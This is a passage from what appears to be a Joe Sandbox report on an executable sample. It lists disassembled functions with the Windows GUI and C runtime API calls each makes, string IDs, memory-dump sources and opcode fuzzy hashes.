                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: strncnt$CompareErrorLastString
                                                                              • String ID:
                                                                              • API String ID: 1776594460-0
                                                                              • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                              • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                              • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                              • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                              Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                              • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                              • GetWindowRect.USER32(?,?), ref: 00454688
                                                                              • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                              • GetDesktopWindow.USER32 ref: 00454708
                                                                              • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                              • GetClientRect.USER32(?,?), ref: 0045476F
                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                              • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                              Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                              • GetCursorInfo.USER32 ref: 00458E03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                              • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                              Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                              • GetFocus.USER32 ref: 004696E0
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$CtrlFocus
                                                                              • String ID: 0
                                                                              • API String ID: 1534620443-4108050209
                                                                              • Opcode ID: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                              • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                              • Opcode Fuzzy Hash: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                              • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                              Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00468107
                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                              • GetMenuItemCount.USER32(?), ref: 00468227
                                                                              • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                              • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                              • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                              • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                              • GetMenuItemCount.USER32 ref: 004682DC
                                                                              • SetMenuItemInfoW.USER32 ref: 00468317
                                                                              • GetCursorPos.USER32(00000000), ref: 00468322
                                                                              • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                              • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3993528054-4108050209
                                                                              • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                              • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                              • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                              • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                              Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • SendMessageW.USER32(?), ref: 0046F34C
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                              • _wcscat.LIBCMT ref: 0046F3BC
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                              • DragFinish.SHELL32(?), ref: 0046F414
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 4085615965-3440237614
                                                                              • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                              • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                              • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                              • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                              Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                              • API String ID: 3832890014-4202584635
                                                                              • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                              • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                              • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                              • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                              Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004669C4
                                                                              • _wcsncpy.LIBCMT ref: 00466A21
                                                                              • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcstok.LIBCMT ref: 00466A90
                                                                                • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                              • _wcstok.LIBCMT ref: 00466B3F
                                                                              • _wcscpy.LIBCMT ref: 00466BC8
                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                              • _wcslen.LIBCMT ref: 00466D1D
                                                                              • _memset.LIBCMT ref: 00466BEE
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _wcslen.LIBCMT ref: 00466D4B
                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                              • String ID: X$HH
                                                                              • API String ID: 3021350936-1944015008
                                                                              • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                              • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                              • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                              • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                              Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F4AE
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                              • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$Sleep_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1504565804-4108050209
                                                                              • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                              • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                              • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                              • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                              Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateDestroy
                                                                              • String ID: ,$tooltips_class32
                                                                              • API String ID: 1109047481-3856767331
                                                                              • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                              • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                              • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                              • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                              Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                              • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                              • _wcscat.LIBCMT ref: 0045CD51
                                                                              • _wcscat.LIBCMT ref: 0045CD63
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                              • _wcscpy.LIBCMT ref: 0045CE14
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 1153243558-438819550
                                                                              • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                              • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                              • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                              • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                              Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00455127
                                                                              • GetMenuItemInfoW.USER32 ref: 00455146
                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                              • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                              • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                              • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                              • DrawMenuBar.USER32 ref: 00455207
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1663942905-4108050209
                                                                              • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                              • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                              Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1481289235-0
                                                                              • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                              • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                              Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
